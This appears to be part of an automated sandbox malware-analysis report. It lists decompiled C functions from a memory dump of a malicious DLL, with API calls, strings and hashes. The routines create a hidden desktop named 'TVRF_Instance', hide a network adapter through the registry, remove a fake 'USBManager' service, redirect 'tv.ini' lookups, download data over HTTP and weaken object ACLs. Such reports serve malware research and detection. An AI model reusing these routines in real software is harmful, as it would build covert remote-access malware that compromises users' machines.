    					_t38 = _t38 + 0x18;
    					_v260 = 0;
    					if(RegCreateKeyExA(0x80000002,  &_v256, 0, 0, 0, 0xf023f, 0,  &_v260, 0) == 0) {
    						RegDeleteValueA(_v260, "USBManager");
    						RegCloseKey(_v260);
    					}
    				}
    				_t12 =  *0x6ecb047c; // 0x0
    				wsprintfA( &_v264, "%s\\%s%c%s", _t12, "svchost", 0x5c, "USBPortsManagerGrp");
    				RegDeleteKeyA(0x80000002,  &_v256);
    				wsprintfA( &_v256, "SYSTEM\\CurrentControlSet%s%s%s", "\\Services\\", "USBManager", 0x6ecad543);
    				return RegDeleteKeyA(0x80000002,  &_v248);
    			}


    APIs
      • Part of subcall function 6ECA3700: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6ECA3719
      • Part of subcall function 6ECA3700: OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6ECA3725
      • Part of subcall function 6ECA3700: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 6ECA373D
      • Part of subcall function 6ECA3700: QueryServiceStatus.ADVAPI32(00000000,?), ref: 6ECA374F
      • Part of subcall function 6ECA3700: ControlService.ADVAPI32(00000000,00000001,?), ref: 6ECA3764
      • Part of subcall function 6ECA3700: QueryServiceStatus.ADVAPI32(00000000,?), ref: 6ECA377C
      • Part of subcall function 6ECA3700: Sleep.KERNEL32(000003E8), ref: 6ECA378E
      • Part of subcall function 6ECA3700: CloseServiceHandle.ADVAPI32(00000000), ref: 6ECA37B5
      • Part of subcall function 6ECA3700: CloseServiceHandle.ADVAPI32(00000000), ref: 6ECA37C0
    • wsprintfA.USER32 ref: 6ECA417A
    • RegCreateKeyExA.ADVAPI32 ref: 6ECA41A5
    • RegDeleteValueA.ADVAPI32(?,USBManager), ref: 6ECA41B9
    • RegCloseKey.ADVAPI32(?), ref: 6ECA41C4
    • wsprintfA.USER32 ref: 6ECA41E6
    • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 6ECA41FB
    • wsprintfA.USER32 ref: 6ECA4216
    • RegDeleteKeyA.ADVAPI32(80000002,?), ref: 6ECA4225
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Service$CloseDeleteOpenwsprintf$HandleManagerQueryStatus$ControlCreateSleepValue
    • String ID: %s\%s%c%s$SYSTEM\CurrentControlSet%s%s%s$USBManager$USBPortsManagerGrp$\Services\$svchost
    • API String ID: 2810420714-3733378816
    • Opcode ID: 6824c44057044eec1c9accd0ca0dcc80fd39c225a36105cd871659703a1e7d92
    • Instruction ID: e33f764915e2e00290d276f134c5dd738144f66ada28aa498fcef133b641ce3f
    • Opcode Fuzzy Hash: 6824c44057044eec1c9accd0ca0dcc80fd39c225a36105cd871659703a1e7d92
    • Instruction Fuzzy Hash: F521C3B1140302BAE614DBDCCD85FBB3BB8AB9470DF004908FF54AA284F670A5058FA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECA4300() {
    				char _v264;
    				char _v364;
    				int _v368;
    				int _v372;
    				char _v376;
    				int _v380;
    				int _v384;
    				char _v388;
    				int _v392;
    				int _v396;
    				int _v400;
    				void* _v404;
    				void* _v408;
    				int _t49;
    				int _t66;
    				char* _t68;
    				CHAR* _t83;
    				int _t90;
    
    				_t68 = M6ECB0584; // 0x0
    				_t90 = 0;
    				_v404 = 0;
    				if(RegOpenKeyExA(0x80000002, _t68, 0, 0xf003f,  &_v404) != 0) {
    					L18:
    					return _t90;
    				}
    				_v396 = 0;
    				_v372 = 0;
    				_v368 = 0;
    				_v384 = 0;
    				if(RegQueryInfoKeyA(_v404, 0, 0, 0,  &_v396,  &_v372, 0,  &_v368,  &_v384, 0, 0, 0) != 0) {
    					L17:
    					RegCloseKey(_v404);
    					goto L18;
    				}
    				_t49 = _v396;
    				if(_t49 <= 0) {
    					goto L17;
    				}
    				_t66 = 0;
    				if(_t49 <= 0) {
    					L16:
    					goto L17;
    				} else {
    					do {
    						_v380 = 0x104;
    						if(RegEnumKeyExA(_v404, _t66,  &_v264,  &_v380, 0, 0, 0, 0) != 0) {
    							goto L14;
    						}
    						_v408 = 0;
    						if(RegOpenKeyExA(_v404,  &_v264, 0, 0x2001b,  &_v408) != 0) {
    							goto L14;
    						}
    						_v392 = 1;
    						_v400 = 0x64;
    						if(RegQueryValueExA(_v408, "ComponentId", 0,  &_v392,  &_v364,  &_v400) == 0) {
    							_t83 = M6ECB04D8; // 0x0
    							if(lstrcmpiA( &_v364, _t83) == 0) {
    								_v400 = 4;
    								_v392 = 4;
    								_v388 = 0;
    								if(RegQueryValueExA(_v408, "Characteristics", 0,  &_v392,  &_v388,  &_v400) == 0) {
    									_v376 = 0x89;
    									if(_v388 == 0x89 || RegSetValueExA(_v408, "Characteristics", 0, 4,  &_v376, 4) == 0) {
    										_t90 = 1;
    									}
    								}
    							}
    						}
    						CloseHandle(_v408);
    						if(_t90 != 0) {
    							break;
    						}
    						L14:
    						_t66 = _t66 + 1;
    					} while (_t66 < _v396);
    					goto L16;
    				}
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,?), ref: 6ECA4327
    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 6ECA4365
    • RegEnumKeyExA.ADVAPI32 ref: 6ECA43B0
    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,0002001B,?), ref: 6ECA43DA
    • RegQueryValueExA.ADVAPI32(00000000,ComponentId,00000000,?,?,00000000), ref: 6ECA4412
    • lstrcmpiA.KERNEL32(?,00000000), ref: 6ECA4424
    • RegQueryValueExA.ADVAPI32(00000000,Characteristics,00000000,?,?,00000000), ref: 6ECA4459
    • RegSetValueExA.ADVAPI32(?,Characteristics,00000000,00000004,?,00000004), ref: 6ECA4482
    • CloseHandle.KERNEL32(?), ref: 6ECA4496
    • RegCloseKey.ADVAPI32(?), ref: 6ECA44B2
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: QueryValue$CloseOpen$EnumHandleInfolstrcmpi
    • String ID: Characteristics$ComponentId$d
    • API String ID: 678791777-1822972205
    • Opcode ID: 2888d88c13dc4662f20e3dcaa4bc946ea56fe065d06a485cb7798129673366cf
    • Instruction ID: ef90349ab9cd7aba5c17c3748671f61791f7acebb73b8c156d68074879c5099b
    • Opcode Fuzzy Hash: 2888d88c13dc4662f20e3dcaa4bc946ea56fe065d06a485cb7798129673366cf
    • Instruction Fuzzy Hash: DB5106B1218346AFD350DFA9D984EABBBF9FBC9B08F00491DFA95D2104E7709505CB22
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E6ECAA130(void* _a4) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t5;
    				struct HDESK__* _t7;
    				struct HDESK__* _t13;
    				void* _t15;
    
    				if( *0x6ecb027c < 6 || M6ECB0544 != 0 || M6ECB0548 == 0) {
    					if(_a4 == 0) {
    						return _t5;
    					} else {
    						_a4 = 1;
    						_t7 = GetThreadDesktop(GetCurrentThreadId());
    						 *0x6ecb0484 = _t7;
    						if(_t7 != 0) {
    							_t7 = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
    							 *0x6ecb0480 = _t7;
    							if(_t7 != 0) {
    								_t15 = CreateThread(0, 0, E6ECA96D0, _a4, 0, 0);
    								if(_t15 != 0) {
    									WaitForSingleObject(_t15, 0xffffffff);
    									CloseHandle(_t15);
    									Sleep(0xfa0);
    								}
    								_t13 =  *0x6ecb0480; // 0x0
    								return CloseDesktop(_t13);
    							}
    						}
    						return _t7;
    					}
    				} else {
    					_push(__edi);
    					__eax = CreateEventA(0, 1, 0, "TVRF_Instance");
    					__edi = __eax;
    					if(__edi == 0) {
    						L12:
    						_pop(__edi);
    						return __eax;
    					}
    					if(GetLastError() == 0xb7) {
    						__eax = CloseHandle(__edi);
    						goto L12;
    					}
    					__eax = GetCurrentThreadId();
    					__eax = GetThreadDesktop(__eax);
    					__ebx = CloseHandle;
    					 *0x6ecb0484 = __eax;
    					if(__eax != 0) {
    						__eax = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
    						 *0x6ecb0480 = __eax;
    						if(__eax != 0) {
    							__eax = _a4;
    							_push(__esi);
    							__esi = CreateThread(0, 0, E6ECA9D10, _a4, 0, 0);
    							if(__esi != 0) {
    								WaitForSingleObject(__esi, 0xffffffff) = CloseHandle(__esi);
    								Sleep(0xfa0);
    							}
    							__ecx =  *0x6ecb0480; // 0x0
    							__eax = CloseDesktop(__ecx);
    							_pop(__esi);
    						}
    					}
    					__eax = CloseHandle(__edi);
    					_pop(__edi);
    					return __eax;
    				}
    			}

    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,TVRF_Instance,73FCF930,6ECAA2BE,00000001,?,?,?,?,?,?), ref: 6ECAA163
    • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 6ECAA16F
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 6ECAA17D
    • GetCurrentThreadId.KERNEL32 ref: 6ECAA186
    • GetThreadDesktop.USER32(00000000,?,?,?,?,?,?,?), ref: 6ECAA18D
    • CreateDesktopA.USER32 ref: 6ECAA1B4
    • CreateThread.KERNEL32 ref: 6ECAA1D6
    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?), ref: 6ECAA1E5
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 6ECAA1EC
    • Sleep.KERNEL32(00000FA0,?,?,?,?,?,?,?), ref: 6ECAA1F3
    • CloseDesktop.USER32(00000000,?,?,?,?,?,?,?), ref: 6ECAA200
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 6ECAA208
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Close$CreateDesktopHandleThread$CurrentErrorEventLastObjectSingleSleepWait
    • String ID: TVRF_Instance
    • API String ID: 2944326888-3589830093
    • Opcode ID: d94b2f52061c6ffdb4e70ec3364a205b5ff6d7875926053dfb698f5286ebd129
    • Instruction ID: 2223e68a362e91309155ab9b6a0c126416ac903b42afc3cb8253d7e7bd60f697
    • Opcode Fuzzy Hash: d94b2f52061c6ffdb4e70ec3364a205b5ff6d7875926053dfb698f5286ebd129
    • Instruction Fuzzy Hash: 3921AE30145B03FBEB505BAC8E09B9E3A75AB86B2AF200604FB15962C4EB70D840CE15
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECA5540(void* _a4, intOrPtr* _a8) {
    				long _v4;
    				void _v8;
    				long* _v12;
    				void* _v16;
    				intOrPtr _v28;
    				long _v32;
    				void* _v44;
    				int _v48;
    				long _v60;
    				int _t35;
    				long _t40;
    				void* _t44;
    				long _t53;
    				DWORD* _t54;
    
    				_t54 = 0;
    				_t53 = 0;
    				_t44 = HeapAlloc(GetProcessHeap(), 8, 0x2000);
    				if(_t44 == 0) {
    					 *_a8 = 0;
    					return 0;
    				} else {
    					_v8 = 0;
    					_v4 = 4;
    					if(HttpQueryInfoA(_a4, 0x20000013,  &_v8,  &_v4, 0) != 0 && _v28 == 0xc8) {
    						_v32 = 0;
    						if(InternetReadFile(_v16, _t44, 0x1fff,  &_v32) != 0) {
    							while(1) {
    								_t35 = _v48;
    								if(_t35 == 0) {
    									goto L15;
    								}
    								if(_t54 > 0x100000) {
    									if(_t53 != 0) {
    										goto L13;
    									}
    									goto L14;
    								} else {
    									if(_t53 != 0) {
    										_t40 = HeapReAlloc(GetProcessHeap(), 0, _t53, _t35 + _t54 + 1);
    										if(_t40 == 0) {
    											L13:
    											HeapFree(GetProcessHeap(), 0, _t53);
    											L14:
    											_t53 = 0;
    											_t54 = 0;
    										} else {
    											goto L10;
    										}
    									} else {
    										_t12 = _t54 + 1; // 0x20000014
    										_t40 = HeapAlloc(GetProcessHeap(), _t53, _t35 + _t12);
    										L10:
    										_t53 = _t40;
    										RtlMoveMemory(_t53 + _t54, _t44, _v48);
    										_t54 = _t54 + _v60;
    										 *(_t53 + _t54) = 0;
    										_v60 = 0;
    										if(InternetReadFile(_v44, _t44, 0x1fff,  &_v60) != 0) {
    											continue;
    										} else {
    										}
    									}
    								}
    								goto L15;
    							}
    						}
    					}
    					L15:
    					HeapFree(GetProcessHeap(), 0, _t44);
    					 *_v12 = _t53;
    					return _t54;
    				}
    			}

    APIs
    • GetProcessHeap.KERNEL32(00000008,00002000,00000000,00000000,?,00000000), ref: 6ECA5558
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA555B
    • HttpQueryInfoA.WININET ref: 6ECA558C
    • InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 6ECA55BC
    • GetProcessHeap.KERNEL32(00000000,20000014), ref: 6ECA55EE
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA55F1
    • GetProcessHeap.KERNEL32(00000000,00000000,?), ref: 6ECA5601
    • HeapReAlloc.KERNEL32(00000000), ref: 6ECA5604
    • RtlMoveMemory.NTDLL(?,00000000,20000013), ref: 6ECA561A
    • InternetReadFile.WININET(?,00000000,00001FFF,20000013), ref: 6ECA563F
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA5652
    • HeapFree.KERNEL32(00000000), ref: 6ECA5655
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA5662
    • HeapFree.KERNEL32(00000000), ref: 6ECA5665
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$Process$Alloc$FileFreeInternetRead$HttpInfoMemoryMoveQuery
    • String ID:
    • API String ID: 1362589046-0
    • Opcode ID: 5e30263d0a350cd849d8b3173b98dcf19fe6e6df158ce3151af5e0bc99964cf0
    • Instruction ID: 8ad067ae6043b68e95bba1999263d777ac10189274641f776d4baccfc38fa123
    • Opcode Fuzzy Hash: 5e30263d0a350cd849d8b3173b98dcf19fe6e6df158ce3151af5e0bc99964cf0
    • Instruction Fuzzy Hash: 873160B12043029BD700DF99D944F6BBBEDFB89748F01491DFA5993244EB34D905CB61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 60%
    			E6ECA7C40(signed int __eax, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
    				char _v516;
    				short _v524;
    				short _v532;
    				signed int _t19;
    				intOrPtr _t21;
    				WCHAR* _t23;
    				WCHAR* _t26;
    				intOrPtr _t34;
    				intOrPtr _t40;
    				WCHAR* _t44;
    				WCHAR* _t47;
    				WCHAR* _t52;
    				WCHAR* _t54;
    
    				_t19 = __eax;
    				_t54 = _a4;
    				if(_t54 == 0) {
    					L10:
    					_push(_a28);
    					_push(_a24);
    					_t21 = _a12;
    					_push(_a20);
    					_push(_a16);
    					_push(_t21);
    					_push(_a8);
    					_push(_t54);
    					M6ECB05A4();
    					return _t21;
    				} else {
    					if( *_t54 != 0x3a) {
    						_t52 = PathFindFileNameW(_t54);
    						_t23 = M6ECB0528; // 0xcc27f0
    						if(lstrcmpiW(_t54, _t23) == 0) {
    							_pop(_t52);
    							_pop(_t54);
    							_t44 = M6ECB0534; // 0xcc2700
    							_a4 = _t44;
    							goto M6ECB05A4;
    						}
    						_t47 = M6ECB056C; // 0x0
    						_t19 = lstrcmpiW(_t52, _t47);
    						if(_t19 == 0) {
    							goto L2;
    						} else {
    							_t26 = M6ECB0554; // 0x0
    							_t19 = StrCmpNIW(_t54, _t26, 0xb);
    							if(_t19 == 0) {
    								goto L2;
    							} else {
    								if(lstrcmpiW(_t52, L"tv.ini") != 0) {
    									goto L10;
    								} else {
    									wsprintfW( &_v532, L"%s%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", _t52);
    									if(lstrcmpiW( &_v524, _t54) != 0) {
    										goto L10;
    									} else {
    										_t40 = M6ECB0550; // 0x0
    										wsprintfW( &_v524, L"%s%s%s", "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD", _t40, L".ini");
    										_push(_a36);
    										_push(_a32);
    										_push(_a28);
    										_t34 = _a16;
    										_push(_a24);
    										_push(_a20);
    										_push(_t34);
    										_push( &_v516);
    										M6ECB05A4();
    										return _t34;
    									}
    								}
    							}
    						}
    					} else {
    						L2:
    						return _t19 | 0xffffffff;
    					}
    				}
    			}

    APIs
    • PathFindFileNameW.SHLWAPI(?), ref: 6ECA7C6E
    • lstrcmpiW.KERNEL32(?,00CC27F0), ref: 6ECA7C83
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: FileFindNamePathlstrcmpi
    • String ID: %s%s$%s%s%s$.ini$tv.ini
    • API String ID: 1236376524-2591480844
    • Opcode ID: aed4e2e163a5c5e7ccabbd3a2e842e74a498bc7fe9fe10343bb4f8ff67a8877d
    • Instruction ID: 90d56b97fcc1a11bf9326ad781683e800d6b43c0011252d6e0c60488903914b1
    • Opcode Fuzzy Hash: aed4e2e163a5c5e7ccabbd3a2e842e74a498bc7fe9fe10343bb4f8ff67a8877d
    • Instruction Fuzzy Hash: DE31BD72205602ABC620DB98DE85EAB77B8EFC9724F10451DFA4583244E734E8058BA6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E6ECA3390() {
    				intOrPtr _v4;
    				short _v12;
    				struct _SID_IDENTIFIER_AUTHORITY _v16;
    				void* _v20;
    				void* _v24;
    				long _v28;
    				void* _t56;
    
    				_v12 = 0;
    				_v20 = 0;
    				if(OpenProcessToken(0xffffffff, 8,  &_v20) == 0) {
    					return 0;
    				} else {
    					_v24 = 0;
    					if(GetTokenInformation(_v20, 1, 0, 0,  &_v24) == 0 && GetLastError() == 0x7a) {
    						_t56 = HeapAlloc(GetProcessHeap(), 8, _v28);
    						if(_t56 != 0) {
    							if(GetTokenInformation(_v24, 1, _t56, _v28,  &_v28) != 0) {
    								_v16.Value = 0;
    								_v12 = 0x500;
    								_v24 = 0;
    								if(AllocateAndInitializeSid( &_v16, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
    									if(EqualSid( *_t56, _v24) == 0) {
    										_push(_v4);
    										_push( *_t56);
    										L6ECAC384();
    									} else {
    										_v20 = 1;
    									}
    								}
    								FreeSid(_v24);
    							}
    							HeapFree(GetProcessHeap(), 0, _t56);
    						}
    					}
    					CloseHandle(_v24);
    					return _v16.Value;
    				}
    			}

    APIs
    • OpenProcessToken.ADVAPI32(000000FF,00000008,?), ref: 6ECA33AA
    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 6ECA33D1
    • GetLastError.KERNEL32 ref: 6ECA33DB
    • GetProcessHeap.KERNEL32(00000008,?), ref: 6ECA33F8
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA33FB
    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 6ECA341D
    • AllocateAndInitializeSid.ADVAPI32 ref: 6ECA3447
    • EqualSid.ADVAPI32(?,00000000), ref: 6ECA3459
    • ConvertSidToStringSidA.ADVAPI32(00000000,00000000), ref: 6ECA3475
    • FreeSid.ADVAPI32(00000000), ref: 6ECA347F
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA3487
    • HeapFree.KERNEL32(00000000), ref: 6ECA348A
    • CloseHandle.KERNEL32(?), ref: 6ECA3496
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$ProcessToken$FreeInformation$AllocAllocateCloseConvertEqualErrorHandleInitializeLastOpenString
    • String ID:
    • API String ID: 1769087308-0
    • Opcode ID: 2f5cef247efcac5d0059a7fd9510bcddae220e1c533e5c38dbad87a8efb9399a
    • Instruction ID: 6b1cfb3c2ebe7da79d98b24cf8c69fa5601ad1c864d8fbadd18028925db0b9a8
    • Opcode Fuzzy Hash: 2f5cef247efcac5d0059a7fd9510bcddae220e1c533e5c38dbad87a8efb9399a
    • Instruction Fuzzy Hash: B0311BB1204302AFD610DFADCC98D9FBBB9EB85754F00891CFA9583245E775D805CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 22%
    			E6ECA2000(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
    				char _v40;
    				char _v48;
    				void* _v52;
    				long _v56;
    				long _v60;
    				long _v64;
    				long _v68;
    				intOrPtr _v72;
    				intOrPtr _v76;
    				char _v80;
    				char _v92;
    				intOrPtr _v96;
    				intOrPtr _v108;
    				intOrPtr _t28;
    				intOrPtr _t29;
    				long* _t34;
    				signed int _t38;
    				void* _t50;
    				long _t52;
    				intOrPtr _t55;
    
    				_t28 =  *_a8;
    				_t52 = 0;
    				_v48 = 0;
    				if(_t28 == 0) {
    					_t29 = _a4;
    					if(_t29 == 0) {
    						goto L2;
    					} else {
    						_t55 = _a12;
    						__imp__GetNamedSecurityInfoA(_t29, _t55, 4, 0, 0,  &_v48, 0,  &_v40);
    						if(_t29 != 0) {
    							goto L2;
    						} else {
    							goto L5;
    						}
    					}
    				} else {
    					_t55 = _a12;
    					__imp__GetSecurityInfo(_t28, _t55, 4, 0, 0,  &_v48, 0,  &_v40);
    					if(_t28 == 0) {
    						L5:
    						_v68 = 0x44;
    						_t50 = HeapAlloc(GetProcessHeap(), 8, 0x44);
    						if(_t50 != 0) {
    							_t34 =  &_v68;
    							__imp__CreateWellKnownSid(1, 0, _t50, _t34);
    							if(_t34 != 0) {
    								_v76 = 1;
    								_v80 = 0x10000000;
    								_v72 = 3;
    								_v64 = 0;
    								_v68 = 0;
    								_v52 = _t50;
    								_v60 = 0;
    								_v56 = 0;
    								__imp__SetEntriesInAclA(1,  &_v80, _v96,  &_v92);
    								_t38 =  *_v56;
    								if(_t38 == 0) {
    									_t38 = _v60;
    									if(_t38 != 0) {
    										__imp__SetNamedSecurityInfoA(_t38, _t55, 4, 0, 0, _v108, 0);
    										goto L11;
    									}
    								} else {
    									__imp__SetSecurityInfo(_t38, _t55, 4, 0, 0, _v108, 0);
    									L11:
    									asm("sbb esi, esi");
    									_t52 =  ~_t38 + 1;
    								}
    							}
    							HeapFree(GetProcessHeap(), 0, _t50);
    						}
    						return _t52;
    					} else {
    						L2:
    						return 0;
    					}
    				}
    			}

    APIs
    • GetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?), ref: 6ECA202D
    • GetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?), ref: 6ECA205D
    • GetProcessHeap.KERNEL32 ref: 6ECA2074
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA207B
    • CreateWellKnownSid.ADVAPI32(00000001,00000000,00000000,?), ref: 6ECA2094
    • SetEntriesInAclA.ADVAPI32(00000001,?,?,00000044), ref: 6ECA20DF
    • SetSecurityInfo.ADVAPI32(00000000,?,00000004,00000000,00000000,00000044,00000000), ref: 6ECA20FB
    • SetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,00000044,00000000), ref: 6ECA2117
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA2126
    • HeapFree.KERNEL32(00000000), ref: 6ECA212D
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: HeapInfoSecurity$NamedProcess$AllocCreateEntriesFreeKnownWell
    • String ID: D
    • API String ID: 1714474399-2746444292
    • Opcode ID: ee6da21a19ef63651c0e98d5c6e4a4738e357672dcc0ba3a1c44f07291cc548b
    • Instruction ID: d6584f887831cd6be6d36aae669bbb9dde9a374c1c765760d2cdecd2196d9f16
    • Opcode Fuzzy Hash: ee6da21a19ef63651c0e98d5c6e4a4738e357672dcc0ba3a1c44f07291cc548b
    • Instruction Fuzzy Hash: CB4138B1204316AFE7148F99CD98E6BBBFCEB85788F00491DFB5187140E675DC048B62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E6ECA12C0(char* _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v264;
    				char _v288;
    				char _v300;
    				intOrPtr _v304;
    				char _v308;
    				long _v312;
    				char* _t18;
    				void* _t20;
    				char* _t28;
    				char* _t32;
    				char* _t40;
    				void* _t42;
    				intOrPtr _t43;
    				long* _t48;
    
    				_t18 =  &_v300;
    				_push(_t18);
    				_push(0xffffffff);
    				_push(E6ECA10E0);
    				_push(E6ECA10D0);
    				_push(E6ECA10A0);
    				_push(E6ECA1070);
    				_push(E6ECA1000);
    				_push(E6ECA1050);
